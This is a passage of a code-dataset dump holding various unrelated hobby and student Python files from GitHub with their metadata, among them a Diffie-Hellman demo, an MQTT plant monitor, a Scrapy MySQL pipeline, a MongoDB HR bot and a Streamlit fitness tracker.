числа p = %d и g = %d\"%(p,g))\n\tpriv=[]\n\tprint(\"Каждая сторона выберает свое уникальное число\")\n\tfor i in range(z):\n\t\te=random.randint(1,p-1)\n\t\tpriv.append(e)\n\tprint(priv)\n\tprint(\"Все игроки поделились своеми публичными ключами, теперь на основе полученых ключей они расчитают\")\n\toutzn=[]\n\tfor i in range(z):\n\t\tb=g\n\t\tfor j in range(z):\n\t\t\tif i==j:\n\t\t\t\tNone\n\t\t\telse:\n\t\t\t\tb=b**priv[j]%p\n\t\toutzn.append(b)\n\t\tprint(\"Учистник %d выбрал параметр %d и после того как расчитали получили участник %d получил следующее число %d\"%(i+1,priv[i],i+1,b))\n\tprint(outzn)\n\tprint(\"Теперь каждый считает ключ который должен быть у всех одинаковый\")\n\trez=[]\n\tfor i in range(z):\n\t\tpp=(outzn[i]**priv[i])%p\n\t\trez.append(pp)\n\tprint(rez)\n\np=3011\ng=random.randint(1,p-1)\nchif(p,g)\n\n","repo_name":"AppallingFiend/MyProfile","sub_path":"DefHelm.py","file_name":"DefHelm.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39844040079","text":"import constants\nimport comms.queueHandler \nimport lib.packageJSON \nimport lib.helpers \nimport sensors.readTemperature \nimport sensors.readMoisture\nimport sensors.readLight\n#import paho.mqtt.client as mqtt\nimport time\n\ndef record_temperature(client, temperature_sensor, host_name):\n current_temperature = sensors.readTemperature.read_temperature(temperature_sensor)\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.temperature_label,\n current_temperature, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_air_temperature)\n\ndef record_moisture(client, moisture_sensor, host_name):\n current_moisture = sensors.readMoisture.read_moisture(moisture_sensor)\n current_moisture_voltage = sensors.readMoisture.read_voltage(moisture_sensor)\n\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.moisture_label,\n current_moisture, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_moisture)\n \n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.moisture_voltage_label,\n current_moisture_voltage, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_moisture)\n\ndef record_light(client, light_sensor, host_name):\n current_light = sensors.readLight.read_light(light_sensor)\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.light_label,\n current_light, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_light)\n\ndef main():\n host_name = lib.helpers.get_hostname()\n\n if(constants.read_temperature):\n temperature_sensor = sensors.readTemperature.get_sensor(constants.air_temp_pin)\n if(constants.read_moisture):\n moisture_sensor = sensors.readMoisture.get_sensor(constants.moisture_pin, constants.moisture_dry_voltage, constants.moisture_wet_voltage)\n if(constants.read_light):\n light_sensor = sensors.readLight.get_sensor(constants.light_pin)\n\n client = comms.queueHandler.get_client(constants.clientPublishName, constants.brokerAddress)\n\n while True:\n if(constants.read_temperature):\n record_temperature(client, 
temperature_sensor, host_name)\n\n if(constants.read_moisture):\n record_moisture(client, moisture_sensor, host_name)\n\n if(constants.read_light):\n record_light(client, light_sensor, host_name)\n\n time.sleep(constants.read_sensor_interval)\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Tartanyak/PlantNet","sub_path":"plant_monitor.py","file_name":"plant_monitor.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4783634494","text":"import sys\nimport os\nimport string\nimport mrs\n\n\ndef sortList(text):\n return sorted(text, key= lambda x: x[1], reverse=True)\n\ndef top_Kquery(text, k):\n return text[:k]\n\ndef process():\n cur_ = os.getcwd()\n dir_ = os.path.join(cur_, \"outputdocs\")\n fname = os.path.join(dir_,\"source_0_split_0_.mtxt\")\n with open(fname, \"r\") as f:\n text = f.readlines()\n\n for i in text:\n text[text.index(i)] = tuple(i.split())\n \n\n return text\n\n\nif __name__ == '__main__':\n\n sorted_txt = sortList(process())\n query = [10,20]\n for k in query:\n topkquery = open(\"./outputdocs/top\"+ str(k) + \"_kquery.txt\", \"w\")\n topkquery.write(\"Top: \"+ str(k) + \" occuring words\\n\")\n for i in top_Kquery(sorted_txt,k):\n topkquery.write(i[0] + \" \" + i[1] + \"\\n\")\n\n topkquery.close()\n","repo_name":"witseie-elen4020/group09-lab3-2022","sub_path":"topk_queryMethod2.py","file_name":"topk_queryMethod2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4657546061","text":"import requests as rqt\n\nDIC_DOMINIOS = {}\n\n\ndef getDomains():\n \"\"\"Abre o arquivo dominios.txt e salva seus elementos em um dicionário\"\"\"\n\n with open(\"dominios.txt\", \"r\") as f:\n for x in f.readlines():\n domi, addr = x[:-1].split(\" \")\n DIC_DOMINIOS[domi] = addr\n\n\ndef dns(domain):\n \"\"\"Simula o funcionamento de um DNS\"\"\"\n getDomains()\n\n # Checa se o domínio está presente na database offline\n if domain in DIC_DOMINIOS.keys():\n return DIC_DOMINIOS.get(domain)\n\n # Caso não encontre, procura na internet\n verification = rqt.get(\"https://{}\".format(domain), stream=True)\n if verification.status_code in [404, 400]:\n return \"NOT FOUND\"\n\n found_ip = verification.raw._connection.sock.getpeername()\n string_to_send = \"{}:{}\".format(found_ip[0], found_ip[1])\n DIC_DOMINIOS.update({domain: string_to_send})\n\n return string_to_send\n","repo_name":"sociedade-do-pastel/SMTP-2","sub_path":"dns_server.py","file_name":"dns_server.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74805901370","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport MySQLdb\nimport MySQLdb.cursors\nimport pymysql\n\nfrom twisted.enterprise import adbapi\n\n\nclass TunefindspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass MysqlTwistedPipeline(object):\n #twist异步连接,进行mysql数据库操作\n def __init__(self,dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls,settings):\n dbparams = dict(\n host = settings[\"MYSQL_HOST\"],\n db = settings[\"MYSQL_DBNAME\"],\n user = settings[\"MYSQL_USER\"],\n passwd = settings[\"MYSQL_PASSWORD\"],\n charset = \"utf8\",\n 
cursorclass =MySQLdb.cursors.DictCursor,\n use_unicode = True,\n )\n\n #创建连接池\n dbpool = adbapi.ConnectionPool(\"MySQLdb\",**dbparams)\n\n return cls(dbpool)\n\n\n def process_item(self, item, spider):\n #数据库操作\n # if item.QUREY:\n # query = self.dbpool.runInteraction(self.do_query,item)\n\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider)\n\n def handle_error(self, failure, item, spider):\n #处理异常\n print(failure)\n\n\n def do_insert(self, cursor, item):\n #入库\n insert_sql, params = item.get_insert_sql()\n cursor.execute(insert_sql, params)\n\n\n\n\n\n\n","repo_name":"xuantianqiang/mytunefindspider","sub_path":"TunefindSpider/TunefindSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28560108581","text":"'''\nDescription: This file contains the code for the DTPM module.\n'''\nimport sys\n\nfrom gym_ds3.envs.power import DTPM_policies as DTPM_policies\nfrom gym_ds3.envs.power import DTPM_power_models as DTPM_power_models\nfrom gym_ds3.envs.utils import DASH_Sim_utils\n\n\nclass DTPMmodule:\n '''\n The DTPM module is responsible for evaluating the PE utilization and changing the V/F according to the defined policy\n '''\n def __init__(self, args, env, env_storage, resource_matrix, PEs):\n '''\n env: Pointer to the current simulation environment\n resource_matrix: The data structure that defines power/performance\n PEs: The PEs available in the current SoC\n timestamp_last_update: Contains the timestamp from the last time each PE was evaluated\n '''\n self.args = args\n self.env = env\n self.env_storage = env_storage\n self.resource_matrix = resource_matrix\n self.PEs = PEs\n self.timestamp_last_update = [-1] * len(PEs)\n self.timestamp_sample_update = 0\n\n if args.verbose:\n print('[D] DVFS module was initialized')\n\n def evaluate_PE(self, resource, current_PE, timestamp):\n\n if self.timestamp_last_update[current_PE.ID] != timestamp and timestamp != self.args.initial_timestamp:\n\n self.timestamp_last_update[current_PE.ID] = timestamp\n\n DASH_Sim_utils.update_PE_utilization_and_info(self.args, self.env_storage, current_PE, timestamp)\n\n if self.args.verbose:\n print('%12s' % (''), 'Utilization for %s is %.2f' % (current_PE.name, current_PE.utilization))\n\n if resource.DVFS == 'ondemand' or resource.DVFS == 'powersave' or str(resource.DVFS).startswith(\"constant\"):\n # The only DVFS mode that does not require OPPs is the performance one\n if len(resource.OPP) == 0:\n print(\"[E] PEs using %s DVFS mode must have at least one OPP, please check the resource file\" % resource.DVFS)\n sys.exit()\n\n # Apply Monte Carlo method for the expert feedback, if enabled\n # if args.monte_carlo_simulations and str(resource.DVFS).startswith(\"constant\") and args.CHECKPOINT_CREATE_TMP:\n # if len(args.DVFS_cfg_monte_carlo[current_PE.ID]) > 1:\n # random_walk_decision = args.DVFS_cfg_monte_carlo[current_PE.ID][args.sample_counter]\n # if random_walk_decision == -1:\n # DTPM_power_models.decrease_frequency(resource, current_PE, timestamp)\n # elif random_walk_decision == 0:\n # DTPM_power_models.keep_frequency(resource, current_PE, timestamp)\n # elif random_walk_decision == 1:\n # DTPM_power_models.increase_frequency(resource, current_PE, timestamp)\n # else:\n # print(\"[E] Monte carlo list could not be parsed correctly\")\n # sys.exit()\n # else:\n # DTPM_power_models.keep_frequency(resource, 
current_PE, timestamp)\n\n # Custom DVFS policies\n if resource.DVFS == 'ondemand':\n DTPM_policies.ondemand_policy(resource, current_PE, self.env.now)\n if resource.DVFS == 'imitation-learning':\n DTPM_policies.imitation_learning_policy_L1(resource, current_PE, self.env.now)\n\n # Update temperature\n if timestamp % self.args.sampling_rate_temperature == 0:\n current_PE.current_temperature_vector = DTPM_power_models.predict_temperature(current_PE)\n\n if resource.DVFS != 'none':\n # DASH_Sim_utils.f_trace_frequency(self.env.now, current_PE)\n if self.args.verbose:\n print(\"[D] \", current_PE.ID, current_PE.current_temperature_vector)\n # DASH_Sim_utils.f_trace_PEs(self.env.now, current_PE)\n # DASH_Sim_utils.f_create_dataset_L1(self.env.now, current_PE)\n # DASH_Sim_utils.f_create_checkpoint(self.env.now, current_PE)\n\n # Reset the energy of the sampling period\n current_PE.energy_sampling_period = 0\n\n if self.timestamp_sample_update != timestamp:\n # Increment the sample counter\n # args.sample_counter += 1\n self.timestamp_sample_update = timestamp\n\n def evaluate_idle_PEs(self):\n '''\n Check all PEs and, for those that are idle, adjust the frequency and power accordingly.\n '''\n if self.args.verbose:\n print('[D] Time %s: DVFS module is evaluating PE utilization' % self.env.now)\n for i, resource in enumerate(self.resource_matrix.list):\n current_PE = self.PEs[i]\n # Only evaluate the PE if there is no process running, otherwise the PE itself will call the DVFS evaluation\n if current_PE.process.count == 0:\n self.evaluate_PE(resource, current_PE, self.env.now)\n # Update the power dissipation to be only the static power as the PE is currently idle\n current_PE.current_power = current_PE.current_leakage\n","repo_name":"EpiSci/SoCRATES","sub_path":"gym_ds3/envs/power/DTPM.py","file_name":"DTPM.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"37744936176","text":"import pymongo\r\nimport sqlalchemy\r\n\r\nfrom bson.objectid import ObjectId\r\nfrom pymongo import MongoClient\r\nclient = MongoClient()\r\ndb = client.hrbot\r\ncollection_users = db.users\r\ncollection_unfilled_orders = db.unfilled_orders\r\ncollection_inprocess_orders = db.in_process_orders\r\ncollection_loc = db.locations\r\ncollection_dialogue = db.dialogue_tree\r\n\r\nDB_KEY_USER_ID = 'user_id'\r\nDB_LOC_ID = 'uid'\r\n\r\ndef get_last_order(user_id):\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID:user_id})\r\n if res != None:\r\n return res\r\n else:\r\n order = {DB_KEY_USER_ID: user_id,\r\n 'order_step_id': 1,\r\n 'order_fields': {}\r\n }\r\n collection_users.insert_one(order)\r\n return order\r\n\r\ndef get_info_dialogue_step(step_id):\r\n res = collection_dialogue.find_one({'id': step_id})\r\n return res\r\n\r\ndef insert_answr_order(user_id, answer):\r\n res = get_last_order(user_id)\r\n current_step_info = get_info_dialogue_step(res['order_step_id'])\r\n if current_step_info == None:\r\n raise CurrentStepError('Error step for user {0}'.format(user_id), 'Возникла ошибка. Просим заполнить запрос заново.' 
)\r\n anticipating = current_step_info['set_anticipated_field']\r\n if len(set(current_step_info[filled]) - set(res['order_fields'].keys())) == 0:\r\n insert_user_answer(user_id, anticipating, answer, order=res)\r\n else:\r\n pass #exception\r\n if type(current_step_info['next']) == dict:\r\n if answer in current_step_info['next'] and type(current_step_info['next'][answer]) == str:\r\n next_id = current_step_info['next'][answer]\r\n else:\r\n pass #exception\r\n elif type(current_step_info['next']) == str:\r\n next_id = current_step_info['next']\r\n else:\r\n raise Bot_Exception()\r\n\r\n update_order_step(user_id, next_id, order=res)\r\n\r\n\r\n\r\ndef update_order_step(user_id, next_id, order=None):\r\n if order == None:\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n else:\r\n res=order\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'order_step_id': next_id}})\r\n\r\ndef insert_user_answer(user_id, anticipated_info, answer, order=None):\r\n if order == None:\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n else:\r\n res=order\r\n filled_fields = res['order_fields']\r\n filled_fields[anticipated_info] = answer\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'order_fields': filled_fields}})\r\n\r\n\r\ndef check_user(user_id, key_list):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n keys_list = set(key_list) #преобразование кортежа во множество\r\n keys_search = set(search.keys())\r\n print( 'check user', keys_list.issubset(keys_search))\r\n return keys_list.issubset(keys_search)\r\n\r\ndef get_anticipated_info(user_id):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n if 'anticipated_info' in search:\r\n return search['anticipated_info']\r\n else:\r\n return None\r\n\r\ndef set_anticipated_info(user_id, key_info):\r\n collection_users.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'anticipated_info': key_info}})\r\n\r\ndef missing_keys(user_id, key_list):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n keys_list = set(key_list)\r\n keys_search = set(search.keys())\r\n print('missing keys', keys_list.difference(keys_search))\r\n return list(keys_list.difference(keys_search))\r\n\r\ndef get_user_data_to_db(key, value, user_id):\r\n print('get user data to db: {0}, {1}:{2}'.format(user_id, key, value))\r\n collection_users.update_one({DB_KEY_USER_ID: user_id}, {'$set': {key: value}})\r\n\r\ndef show_personal_info(user_id):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n f = search['pi_1family_name']\r\n n = search['pi_2personal_name']\r\n o = search['pi_3fathers_name']\r\n t = search['pi_4phone']\r\n return f, n, o, t\r\n\r\ndef delete_order_by_user_id(user_id):\r\n collection_unfilled_orders.remove({DB_KEY_USER_ID:user_id})\r\n\r\ndef create_new_user(user_id):\r\n if collection_users.find_one({DB_KEY_USER_ID:user_id}) == None:\r\n result = collection_users.insert_one({DB_KEY_USER_ID:user_id})\r\n print(result.inserted_id)\r\n\r\ndef set_document_copy_to_db(user_id):\r\n collection_unfilled_orders.insert_one({DB_KEY_USER_ID:user_id, 'type_document':'copy'})\r\n\r\ndef set_documents_amount_to_db(user_id, amount):\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'amount': amount}})\r\n\r\ndef set_info_sheet_to_db(user_id):\r\n collection_unfilled_orders.insert_one({DB_KEY_USER_ID:user_id, 'type_document':'info_sheet'})\r\n\r\ndef show_order_info(user_id):\r\n 
search = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n type = search['type_document']\r\n amount = search['amount']\r\n if 'subtype_document' in search:\r\n subtype = search['subtype_document']\r\n else:\r\n subtype = 'NA'\r\n if 'period'in search:\r\n period = search['period']\r\n else:\r\n period = 'NA'\r\n return type, amount, subtype, period\r\n\r\ndef set_location_to_db(user_id, loc_name):\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'location': loc_name}})\r\n\r\ndef get_loc_by_id(uid):\r\n location = collection_loc.find_one({DB_LOC_ID : uid})\r\n return location\r\n\r\ndef transfer_order_to_inprocess(user_id):\r\n col_source = collection_unfilled_orders\r\n col_target = collection_inprocess_orders\r\n #copy data from unfilled orders to inprocess orders\r\n # indexes from source_Collection will not copied in target_Collection\r\n col_source.aggregate([ {'$match': {DB_KEY_USER_ID:user_id} }, {'$out': str(col_target) } ])\r\n #remove data from unfilled orders\r\n col_source.remove({DB_KEY_USER_ID:user_id})\r\n","repo_name":"yulqui/HR_bot","sub_path":"db_bot.py","file_name":"db_bot.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29938319323","text":"import json\nimport logging\nimport os\nimport sys\n\nfrom commands import cmd_login, cmd_register, cmd_check, cmd_disable\n\nCOMMAND_MAP = {\n \"login\": cmd_login,\n \"register\": cmd_register,\n \"check\": cmd_check,\n \"disable\": cmd_disable,\n}\n\ndef main(event, context):\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # Parse arguments\n command = event[\"command\"]\n command_params = event[\"args\"]\n\n command_func = COMMAND_MAP.get(command)\n if (command_func == None):\n retval = f\"Command {command} not found\"\n logger.warning(retval)\n print(retval)\n sys.exit(1)\n\n logger.info(f\"Executing {command} with params {command_params}\")\n result = command_func(*command_params)\n cleanup_json(command_params[0])\n return result\n\nif __name__ == \"__main__\":\n event = {\n \"command\": sys.argv[1],\n \"args\": sys.argv[2:],\n }\n context = {}\n result = main(event, context)\n print(json.dumps(result))\n\ndef cleanup_json(discord_user_id):\n filepath = f\"/tmp/{discord_user_id}.json\"\n if os.path.exists(filepath):\n os.remove(filepath)\n","repo_name":"FabulousCupcake/suzume","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70872569533","text":"from collections import deque\n\nrows, columns = [int(x) for x in input().split()]\nsnake_string = list(input())\nstring_copy = deque(snake_string)\nmatrix = []\nfor row in range(rows):\n current_row = deque()\n while len(string_copy) < columns:\n string_copy.extend(snake_string)\n for col in range(columns):\n if row % 2 == 0:\n current_row.append(string_copy.popleft())\n else:\n current_row.appendleft(string_copy.popleft())\n\n matrix.append(list(current_row))\n\n[print(*matrix[row], sep= \"\") for row in range(rows)]\n\n\n","repo_name":"KaloyanLevenov/python_advanced_SoftUni_Jan_2023","sub_path":"08_multidimensional_lists_exercise/07_snake_moves.py","file_name":"07_snake_moves.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25128677397","text":"from unicodedata 
import name\nimport sqlalchemy\nfrom sqlalchemy import create_engine \nfrom sqlalchemy import Column, String, Integer, Float, DateTime, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom os import path\nfrom sqlalchemy.orm import sessionmaker\nfrom datetime import datetime, timedelta, date\nimport mysql.connector\nimport streamlit as st\nimport pickle\n\n\ndef ex_muscles_reset():\n ex_muscle_groups = pickle.load(open(\"ex_groups\", \"rb\"))\n print(ex_muscle_groups)\n return ex_muscle_groups\n\n\nBase = declarative_base()\nex_muscle_groups = ex_muscles_reset()\n\n\n\ndef newEx_muscleGroup(exName, musclesUsed):\n currentLib = pickle.load(open(\"ex_groups\", \"rb\"))\n currentLib[exName] = musclesUsed\n\n pickle.dump(currentLib, open(\"ex_groups\", \"wb\"))\n ex_muscle_groups = ex_muscles_reset()\n\n\ndef toWeekDay(num):\n days = { \n 0 : 'monday',\n 1 : 'tuesday',\n 2 : 'wednesday',\n 3 : 'thursday',\n 4 : 'friday',\n 5 : 'saturday',\n 6 : 'sunday'\n\n }\n return days[num]\n\ndef pastDate(days):\n past_date = datetime.now() - timedelta(days=days)\n return past_date\n\nclass Exercise(Base):\n __tablename__ = 'exercise'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20))\n reps = Column(Integer)\n sets = Column(Integer)\n weight = Column(Integer)\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addExercise(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n \n def weeklyExercises(self, sess):\n past_date = pastDate(7)\n exercises = sess.query(Exercise).filter(\n Exercise.date > past_date\n ).all()\n return exercises\n \n def populateMuscle_groups(self, sess):\n MuscleGroups = {\n 'chest' : 0,\n 'shoulders' : 0,\n 'triceps' : 0 ,\n 'back' : 0 ,\n 'biceps' : 0 ,\n 'legs' : 0,\n }\n exercises = self.weeklyExercises(sess)\n for ex in exercises:\n for group in ex_muscle_groups[ex.name]:\n MuscleGroups[group] += ex.sets\n \n return MuscleGroups\n\n def weekWorkouts(sess):\n #prima di tutto devo capire che giorno della settimana è questo\n day = datetime.today().weekday() \n past_date = pastDate(day).date()\n print(past_date)\n\n #ora trovo tutti gli esercizi fatti durante la settimana\n exs = sess.query(Exercise).filter(\n Exercise.date > past_date\n ).all()\n \n print(exs)\n #ora li ordino in base alla giornata. Non la giornata della settimana. 
\n\n ex_by_day = {}\n \n\n for ex in exs: \n weekday = toWeekDay(ex.date.weekday())\n ex_by_day[weekday] = []\n\n for ex in exs: \n weekday = toWeekDay(ex.date.weekday())\n ex_by_day[weekday].append(ex)\n\n print (ex_by_day)\n\n\n return ex_by_day\n \n \n def allExercisesTimeFrame(days, sess):\n #returns all the exercises done in the given timeframe for a given user\n\n pastdate = pastDate(days)\n currentDate = date.today()\n\n exList = sess.query(Exercise).filter(\n Exercise.date > pastdate\n ).all\n\n def currentMax(sess, exName):\n \n currentBest = 0\n best = \" \"\n allExs = sess.query(Exercise).filter_by(name = exName).all()\n for ex in allExs:\n if oneRepMax(ex.weight, ex.reps) > currentBest:\n currentBest = oneRepMax(ex.weight, ex.reps)\n best = f\"{ex.weight}kg x {ex.reps}\"\n\n \n return best\n \n\n\n\n\n\nclass Cardio(Base):\n __tablename__ = 'cardio'\n\n id = Column(Integer(), primary_key=True)\n zone = Column(Integer)\n duration = Column(Integer)\n medium = Column(String(30))\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addCardio(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n\n def weeklyCardio(sess):\n weeklyCardio = 0\n past_date = pastDate(7)\n\n cardioSessions = sess.query(Cardio).filter(\n Cardio.date > past_date\n ).all()\n\n for session in cardioSessions:\n weeklyCardio += session.duration\n \n return weeklyCardio\n \nclass FitnessGoal(Base):\n __tablename__ = 'fitnessgoal'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20), unique=True)\n reps = Column(Integer)\n weight = Column(Integer)\n \n def addFitnessGoal(name, weight, reps, sess):\n #qui dovrai aggiungere la ricerca: se esiste già va aggiornato\n goalFound = sess.query(FitnessGoal).filter_by(\n name = name\n ).first()\n\n if goalFound:\n goalFound.weight = weight\n goalFound.reps = reps\n sess.commit()\n print(\"goal updated\")\n\n\n else:\n newGoal = FitnessGoal(name = name, reps = reps, weight = weight)\n sess.add(newGoal)\n sess.commit()\n print(\"goal added\")\n return 0\n \n def goalList(sess):\n goals = sess.query(FitnessGoal).all()\n return goals\n\n\nclass other(Base):\n __tablename__ = 'other'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20))\n duration = Column(Integer)\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addOther(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n\n def dailyFocus(sess):\n dailyFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date > date.today()\n ).all()\n\n\n for session in focusSessions:\n dailyFocus += session.duration\n # Get hours with floor division\n hours = dailyFocus // 60\n\n # Get additional minutes with modulus\n minutes = dailyFocus % 60\n\n \n return [f\"{hours, minutes}\"]\n \n def focusYesterday(sess):\n dailyFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date == pastDate(1)\n ).all()\n\n\n for session in focusSessions:\n dailyFocus += session.duration\n # Get hours with floor division\n hours = dailyFocus // 60\n\n # Get additional minutes with modulus\n minutes = dailyFocus % 60\n\n \n return f\"{hours, minutes}\"\n \n def focusWeekly(sess):\n days = 7\n totalFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date > pastDate(7)\n ).all()\n\ndef createApp():\n DB_NAME = \"database\"\n host = st.secrets.mysql.host\n database = st.secrets.mysql.database\n user = st.secrets.mysql.user\n password = 
st.secrets.mysql.password\n url = f'mysql+mysqlconnector://{user}:{password}@{host}/{database}'\n\n engine = create_engine(url)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind = engine) #this is to connect to the db (engine)\n sess = Session()\n\n\n\n return sess\n\n\n\ndef oneRepMax(weight, reps):\n oneRepMax = weight / ( 1.0278 - 0.0278 * reps )\n\n return int(oneRepMax)\n\n\n\n\ndef current_maxes(sess, maxesNames):\n \n maxesWeights = []\n\n for exercise in maxesNames:\n allExs = sess.query(Exercise).filter_by(name = exercise).all()\n\n bestWeight = 0\n oneRep = 0\n\n for ex in allExs:\n if oneRepMax(ex.weight, ex.maxReps) > oneRep:\n bestWeight = ex.weight\n oneRep = oneRepMax(ex.weight, ex.maxReps)\n bestString = f\"{bestWeight}kg x {ex.maxReps}\"\n maxesWeights.append(bestString)\n\n return maxesWeights\n\ndef improvementTable(sess):\n tab = {\n 'exercise' : [],\n 'current max' : [],\n 'goal' : [],\n }\n ''' '30 days imp' : [],\n '90 days imp' : [],\n '180 days imp' : []'''\n\n goalList = FitnessGoal.goalList(sess)\n \n for goal in goalList:\n tab['exercise'].append(goal.name)\n\n maxList = []\n for ex in tab['exercise']:\n tab['current max'].append(Exercise.currentMax(sess, ex))\n \n for goal in goalList:\n tab['goal'].append(f\"{goal.weight}kg x {goal.reps}\")\n\n\n\n return tab\n\ndef calendarExercises(sess):\n k = {\n 'monday' : [],\n 'tuesday' : [],\n 'wedsnesday' : [],\n 'thursday' : [],\n 'friday' : [],\n 'saturday' : [],\n 'sunday' : [],\n }\n n_to_day = {\n 0 : 'monday',\n 1 : 'tuesday',\n 2 : 'wedsnesday',\n 3 : 'thursday',\n 4 : 'friday',\n 5 : 'saturday',\n 6 : 'sunday'\n }\n bob = Exercise()\n weekExercises = bob.weeklyExercises(sess)\n for ex in weekExercises:\n date = ex.date.weekday()\n k[n_to_day[date]].append(f\"{ex.name} {ex.weight}kg {ex.sets}x{ex.reps}\")\n \n return k\n\ndef fill(Dict):\n \n maxLength = 0\n\n for key in Dict:\n length = len(Dict[key])\n if length > maxLength: \n maxLength = length\n \n print(\"max length is \", maxLength)\n\n emptyList = [' ' for num in range(maxLength)]\n\n for key in Dict:\n if len(Dict[key]) == 0:\n Dict[key] = emptyList\n elif len(Dict[key]) != 0 and len(Dict[key]) < maxLength:\n difference = maxLength - len(Dict[key])\n for diff in range(difference):\n Dict[key].append(' ')\n","repo_name":"arct0r/training.streamlit","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70215456571","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\ndef calc_dihedral(b1, b2, b3):\n '''Refer to the formula on wikipedia: https://en.wikipedia.org/wiki/Dihedral_angle#cite_note-3\n for details. \n It returns angles in a unit of degree. 
\n\n b array has to be a 2D-array in order to support vectorization.\n\n >>> b = np.array([ [0.3, 0.5, 0.3] ])\n\n b array explained:\n - root axis (axis 0): instances of b1 (or b2 or b3)\n - primary axisx (axis 1): XYZ coordinates\n '''\n b12 = np.cross(b1, b2, axis = 1)\n b23 = np.cross(b2, b3, axis = 1)\n b1213 = np.cross(b12, b23, axis = 1)\n b2_norm = b2 / np.linalg.norm(b2, axis = 1, keepdims = True)\n v1 = np.sum( b1213 * b2_norm, axis = 1 )\n v2 = np.sum( b12 * b23, axis =1 )\n\n return np.arctan2(v1, v2) / np.pi * 180.0\n","repo_name":"carbonscott/pyrotein","sub_path":"pyrotein/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15405629362","text":"\"\"\"\r\n @name : a1122\r\n @version : 21.0223\r\n @author : zhangpeng96\r\n @time : 22'00\"\r\n @accepted : all\r\n\"\"\"\r\n\r\ndef judge(n, arr, vertex):\r\n if arr[0] != arr[-1] or n != (vertex+1) or len(set(arr)) != vertex:\r\n return False\r\n for v1, v2 in zip(arr[:-1], arr[1:]):\r\n if not graph[v1][v2]: return False\r\n return True\r\n\r\n\r\nvertex_n, edge_n = map(int, input().split())\r\n\r\ngraph = [ [False]*(vertex_n+1) for _ in 